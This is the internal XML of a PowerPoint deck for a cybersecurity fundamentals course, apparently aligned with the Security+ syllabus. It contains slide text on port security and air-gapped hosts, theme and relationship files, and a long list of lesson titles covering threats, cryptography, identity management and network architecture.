          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="546100" y="520700"/>
            <a:ext cx="9448799" cy="4889500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3712694532"/>
      </p:ext>
    </p:extLst>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EE0E8-6A56-F8CA-2F73-B8A973E649DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684212" y="5008032"/>
            <a:ext cx="8534400" cy="1507067"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Attack Surface</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68140E5E-234B-EDB3-7D6A-ADAC5C9D26A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="684212" y="766861"/>
            <a:ext cx="9882187" cy="4697571"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11600577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E1FDF-03C7-6D47-BE42-70E59AE06C18}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684212" y="5068992"/>
            <a:ext cx="8534400" cy="1507067"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Port Security</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D7B6D6F-E990-CEF1-107A-D6D229ADB2B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684211" y="685800"/>
            <a:ext cx="5411789" cy="4089400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Access to the physical switch ports and switch hardware should be restricted to authorized staff. To accomplish this place the switch appliances in secure server rooms and/or lockable hardware cabinets. To prevent the attachment of</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>unauthorized client devices at unsecured wall ports, the switch port that the wall port cabling connects to can be administratively disabled, or the patch cable can be physically removed from the switch port. Completely disabling ports in this way can introduce a lot of administrative overhead and allow room for error. Also, it doesn’t provide complete protection, as an attacker could unplug a device from an enabled port and connect their own machine. Consequently, more sophisticated methods of ensuring port security have been developed.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Image 339">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89A67303-F4EE-FDC4-695F-3271B2D29664}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5930900" y="4205392"/>
            <a:ext cx="6007100" cy="2474808"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="Image 340">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE18179E-43F1-E6BC-EAD2-A237A7D3F94E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6261101" y="447674"/>
            <a:ext cx="5246688" cy="3757717"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2218954376"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:overrideClrMapping bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk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3EB6B-0415-341C-E5BA-E792B52FA477}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684212" y="5058832"/>
            <a:ext cx="8534400" cy="1507067"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Physical Isolation</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C231772A-F9A7-5313-EA37-475B53D51701}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Some hosts are so security-critical that it is unsafe to connect them to any type of network. One example is the root certification authority in PKI. Another example is a host used to analyze malware execution. A host that is not physically connected to any network is said to be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>air-gapped</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18666787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image" Target="../media/image17.jpeg"/></Relationships>
</file>

<file path=ppt/theme/_rels/theme15.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.jpeg"/></Relationships>
</file>

<file path=ppt/theme/_rels/theme16.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.jpeg"/></Relationships>
</file>

<file path=ppt/theme/_rels/theme17.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.jpeg"/></Relationships>
</file>

<file path=ppt/theme/_rels/theme18.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image23.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_rels/theme21.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/></Relationships>
</file>

<file path=ppt/theme/_rels/theme22.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image25.jpeg"/></Relationships>
</file>

<file path=ppt/theme/_rels/theme26.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image27.jpeg"/></Relationships>
</file>

<file path=ppt/theme/_rels/theme27.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image27.jpeg"/></Relationships>
</file>

<file path=ppt/theme/_rels/theme28.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image27.jpeg"/></Relationships>
</file>

<file path=ppt/theme/_rels/theme4.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.jpeg"/></Relationships>
</file>

<file path=ppt/theme/_rels/theme5.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.jpeg"/></Relationships>
</file>

<file path=ppt/theme/_rels/theme6.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Celestial">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10.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="1_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11.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="2_Droplet">
  <a:themeElements>
    <a:clrScheme name="Droplet">
      <a:dk1>
        <a:sysClr val="windowText" lastClr="000000"/>
      </a:dk1>
      <a:lt1>
        <a:sysClr val="window" lastClr="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="4B4B4B"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="B5B5B5"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="9AC43E"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="44BA98"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="43A9D9"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="6274D8"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="AB54D7"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="D15B37"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="BFE962"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="C0D591"/>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892FADA9-420D-4323-A7A4-C1060166525B}"/>
    </a:ext>
  </a:extLst>
</a:theme>
</file>

<file path=ppt/theme/theme1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13.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="2_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14.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15.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="1_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16.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="2_Circuit">
  <a:themeElements>
    <a:clrScheme name="Circuit">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17.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="3_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18.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="Integral">
  <a:themeElements>
    <a:clrScheme name="Integral">
      <a:dk1>
        <a:sysClr val="windowText" lastClr="000000"/>
      </a:dk1>
      <a:lt1>
        <a:sysClr val="window" lastClr="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="455F51"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="E3DED1"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="99CB38"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="63A537"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="E6D024"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="CC9700"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="4EB3CF"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="378DA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29F68FFC-748B-4FC3-BF39-7F84A6D5840F}"/>
    </a:ext>
  </a:extLst>
</a:theme>
</file>

<file path=ppt/theme/theme19.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1_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20.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="1_Slice">
  <a:themeElements>
    <a:clrScheme name="Slice">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ppt/theme/theme21.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="2_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2.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="3_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3.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="1_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ppt/theme/theme24.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="3_Berlin">
  <a:themeElements>
    <a:clrScheme name="Berlin">
      <a:dk1>
        <a:sysClr val="windowText" lastClr="000000"/>
      </a:dk1>
      <a:lt1>
        <a:sysClr val="window" lastClr="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="8D4585"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="E7E6E6"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="F35AE6"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="FC5283"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="F67C64"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="F89F65"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="55C6BA"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="84A3FD"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="6ED4F6"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="9FECFC"/>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106000"/>
                <a:satMod val="220000"/>
                <a:lumMod val="140000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="50000">
              <a:schemeClr val="phClr">
                <a:shade val="100000"/>
                <a:hueMod val="100000"/>
                <a:satMod val="110000"/>
                <a:lumMod val="130000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="100000">
              <a:schemeClr val="phClr">
                <a:shade val="69000"/>
                <a:hueMod val="88000"/>
                <a:satMod val="16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7D30EEFE-7128-4DE5-8A0D-8D4EF32CB0AF}"/>
    </a:ext>
  </a:extLst>
</a:theme>
</file>

<file path=ppt/theme/theme25.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6.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7.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="1_Parallax">
  <a:themeElements>
    <a:clrScheme name="Parallax">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ppt/theme/theme28.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="2_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29.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5.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6.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="Banded">
  <a:themeElements>
    <a:clrScheme name="Banded">
      <a:dk1>
        <a:srgbClr val="2C2C2C"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="F56617"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="DDDDDD"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="FFC000"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="BD582C"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="865640"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="9B8357"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="C2BC80"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="94A080"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="FF9933"/>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7CF026C-957E-4F4E-893C-D02C23AB6317}"/>
    </a:ext>
  </a:extLst>
</a:theme>
</file>

<file path=ppt/theme/theme7.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8.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="1_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9.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Override1.xml><?xml version="1.0" encoding="utf-8"?>
<a:themeOverride xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">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TM03457452[[fn=Celestial]]</Template>
  <TotalTime>2335</TotalTime>
  <Words>111259</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>4787</Paragraphs>
  <Slides>202</Slides>
  <Notes>202</Notes>
  <HiddenSlides>0</HiddenSlides>
  <MMClips>0</MMClips>
  <ScaleCrop>false</ScaleCrop>
  <HeadingPairs>
    <vt:vector size="6" baseType="variant">
      <vt:variant>
        <vt:lpstr>Fonts Used</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>17</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpstr>Theme</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>29</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpstr>Slide Titles</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>202</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="248" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Arial Rounded MT Bold</vt:lpstr>
      <vt:lpstr>Bahnschrift SemiBold</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>Century Gothic</vt:lpstr>
      <vt:lpstr>Corbel</vt:lpstr>
      <vt:lpstr>Garamond</vt:lpstr>
      <vt:lpstr>Gill Sans MT</vt:lpstr>
      <vt:lpstr>Lucida Sans Unicode</vt:lpstr>
      <vt:lpstr>MS Shell Dlg 2</vt:lpstr>
      <vt:lpstr>Palatino Linotype</vt:lpstr>
      <vt:lpstr>Trebuchet MS</vt:lpstr>
      <vt:lpstr>Tw Cen MT</vt:lpstr>
      <vt:lpstr>Tw Cen MT Condensed</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Wingdings 3</vt:lpstr>
      <vt:lpstr>Celestial</vt:lpstr>
      <vt:lpstr>1_Celestial</vt:lpstr>
      <vt:lpstr>Facet</vt:lpstr>
      <vt:lpstr>Madison</vt:lpstr>
      <vt:lpstr>Circuit</vt:lpstr>
      <vt:lpstr>Banded</vt:lpstr>
      <vt:lpstr>Berlin</vt:lpstr>
      <vt:lpstr>1_Berlin</vt:lpstr>
      <vt:lpstr>Droplet</vt:lpstr>
      <vt:lpstr>1_Droplet</vt:lpstr>
      <vt:lpstr>2_Droplet</vt:lpstr>
      <vt:lpstr>Gallery</vt:lpstr>
      <vt:lpstr>2_Berlin</vt:lpstr>
      <vt:lpstr>Organic</vt:lpstr>
      <vt:lpstr>1_Circuit</vt:lpstr>
      <vt:lpstr>2_Circuit</vt:lpstr>
      <vt:lpstr>3_Circuit</vt:lpstr>
      <vt:lpstr>Integral</vt:lpstr>
      <vt:lpstr>Slice</vt:lpstr>
      <vt:lpstr>1_Slice</vt:lpstr>
      <vt:lpstr>2_Celestial</vt:lpstr>
      <vt:lpstr>3_Celestial</vt:lpstr>
      <vt:lpstr>1_Gallery</vt:lpstr>
      <vt:lpstr>3_Berlin</vt:lpstr>
      <vt:lpstr>1_Facet</vt:lpstr>
      <vt:lpstr>Parallax</vt:lpstr>
      <vt:lpstr>1_Parallax</vt:lpstr>
      <vt:lpstr>2_Parallax</vt:lpstr>
      <vt:lpstr>Wisp</vt:lpstr>
      <vt:lpstr>Cybersecurity foundation</vt:lpstr>
      <vt:lpstr>Lesson 1 – Summarize Fundamental Security Concept</vt:lpstr>
      <vt:lpstr>TOPIC 1A – SECURITY CONCEPT</vt:lpstr>
      <vt:lpstr>Cybersecurity Framework</vt:lpstr>
      <vt:lpstr>Gap Analysis</vt:lpstr>
      <vt:lpstr>ACCESS CONTROL</vt:lpstr>
      <vt:lpstr>REVIEW ACTIVITY : SECURITY CONCEPT</vt:lpstr>
      <vt:lpstr>TOPIC 1B – SECURITY CONTROL</vt:lpstr>
      <vt:lpstr>Security Control Functional Types</vt:lpstr>
      <vt:lpstr>Information Security Roles and Responsibilities</vt:lpstr>
      <vt:lpstr>Information Security Competencies</vt:lpstr>
      <vt:lpstr>Information Security Business Units</vt:lpstr>
      <vt:lpstr>DevSecOps</vt:lpstr>
      <vt:lpstr>REVIEW ACTIVITY: Security Control</vt:lpstr>
      <vt:lpstr>Lesson 1 - Summary</vt:lpstr>
      <vt:lpstr>Lesson 2 - Compare Threat Types</vt:lpstr>
      <vt:lpstr>TOPIC 2A – THREAT ACTORS</vt:lpstr>
      <vt:lpstr>Attributes of Threat Actors</vt:lpstr>
      <vt:lpstr>Motivations of Threat Actors</vt:lpstr>
      <vt:lpstr>Hackers and Hacktivists</vt:lpstr>
      <vt:lpstr>Nation-State Actors</vt:lpstr>
      <vt:lpstr>REVIEW ACTIVITY: Threat actors</vt:lpstr>
      <vt:lpstr>TOPIC 2B - Attack Surfaces</vt:lpstr>
      <vt:lpstr>Network Vectors</vt:lpstr>
      <vt:lpstr>Lure-Based Vectors</vt:lpstr>
      <vt:lpstr>Message-Based Vectors</vt:lpstr>
      <vt:lpstr>Supply Chain Attack Surface</vt:lpstr>
      <vt:lpstr>REVIEW ACTIVITY: ATTACK SURFACES</vt:lpstr>
      <vt:lpstr>Topic 2C - Social Engineering</vt:lpstr>
      <vt:lpstr>Phishing and Pharming</vt:lpstr>
      <vt:lpstr>Business Email Compromise</vt:lpstr>
      <vt:lpstr>Review Activity: Social Engineering</vt:lpstr>
      <vt:lpstr>Lesson 2 - Summary</vt:lpstr>
      <vt:lpstr>Lesson 3 - Explain Cryptographic Solutions</vt:lpstr>
      <vt:lpstr>Topic 3A - Cryptographic Algorithms</vt:lpstr>
      <vt:lpstr>Symmetric Encryption</vt:lpstr>
      <vt:lpstr>Asymmetric Encryption</vt:lpstr>
      <vt:lpstr>Hashing</vt:lpstr>
      <vt:lpstr>Digital Signatures</vt:lpstr>
      <vt:lpstr>Review Activity:Cryptographic Algorithms</vt:lpstr>
      <vt:lpstr>Topic 3B - Public Key Infrastructure</vt:lpstr>
      <vt:lpstr>Certificate Authorities</vt:lpstr>
      <vt:lpstr>Digital Certificates</vt:lpstr>
      <vt:lpstr>Root of Trust</vt:lpstr>
      <vt:lpstr>Certificate Signing Requests</vt:lpstr>
      <vt:lpstr>Subject Name Attributes</vt:lpstr>
      <vt:lpstr>Certificate Revocation</vt:lpstr>
      <vt:lpstr>Key Management</vt:lpstr>
      <vt:lpstr>Cryptoprocessors and Secure Enclaves</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Review Activity: Public Key Infrastructure</vt:lpstr>
      <vt:lpstr>Topic 3C - Cryptographic Solutions</vt:lpstr>
      <vt:lpstr>Disk and File Encryption</vt:lpstr>
      <vt:lpstr>Database Encryption</vt:lpstr>
      <vt:lpstr>Transport Encryption and Key Exchange</vt:lpstr>
      <vt:lpstr>Perfect Forward Secrecy</vt:lpstr>
      <vt:lpstr>Salting and Key Stretching</vt:lpstr>
      <vt:lpstr>Blockchain</vt:lpstr>
      <vt:lpstr>Obfuscation</vt:lpstr>
      <vt:lpstr>Review Activity: Cryptographic Solutions</vt:lpstr>
      <vt:lpstr>Lesson 3 - Summary</vt:lpstr>
      <vt:lpstr>Lesson 4 Implement Identity and Access Management</vt:lpstr>
      <vt:lpstr>Topic 4A - Authentication</vt:lpstr>
      <vt:lpstr>Password Concepts</vt:lpstr>
      <vt:lpstr>Password Managers</vt:lpstr>
      <vt:lpstr>Multifactor Authentication</vt:lpstr>
      <vt:lpstr>Biometric Authentication</vt:lpstr>
      <vt:lpstr>Hard Authentication Tokens</vt:lpstr>
      <vt:lpstr>Soft Authentication Tokens</vt:lpstr>
      <vt:lpstr>Passwordless Authentication</vt:lpstr>
      <vt:lpstr>Review Activity: Authentication</vt:lpstr>
      <vt:lpstr>Topic 4B - Authorization</vt:lpstr>
      <vt:lpstr>Role- and Attribute-Based Access Control</vt:lpstr>
      <vt:lpstr>Least Privilege Permission Assignments</vt:lpstr>
      <vt:lpstr>User Account Provisioning</vt:lpstr>
      <vt:lpstr>Account Attributes and Access Policies</vt:lpstr>
      <vt:lpstr>Account Restrictions</vt:lpstr>
      <vt:lpstr>Privileged Access Management (PAM)</vt:lpstr>
      <vt:lpstr>Review Activity: Authorization</vt:lpstr>
      <vt:lpstr>Topic 4C - Identity Management</vt:lpstr>
      <vt:lpstr>Local, Network, and Remote Authentication</vt:lpstr>
      <vt:lpstr>Directory Services</vt:lpstr>
      <vt:lpstr>Single Sign-on Authentication</vt:lpstr>
      <vt:lpstr>Single Sign-on Authorization</vt:lpstr>
      <vt:lpstr>Federation</vt:lpstr>
      <vt:lpstr>Security Assertion Markup Language</vt:lpstr>
      <vt:lpstr>Open Authorization</vt:lpstr>
      <vt:lpstr>Review Activity: Identity Management</vt:lpstr>
      <vt:lpstr>Lesson 4 Summary</vt:lpstr>
      <vt:lpstr>Lesson 5 - Secure Enterprise Network Architecture</vt:lpstr>
      <vt:lpstr>Topic 5A - Enterprise Network Architecture</vt:lpstr>
      <vt:lpstr>Network Infrastructure</vt:lpstr>
      <vt:lpstr>Switching Infrastructure Considerations</vt:lpstr>
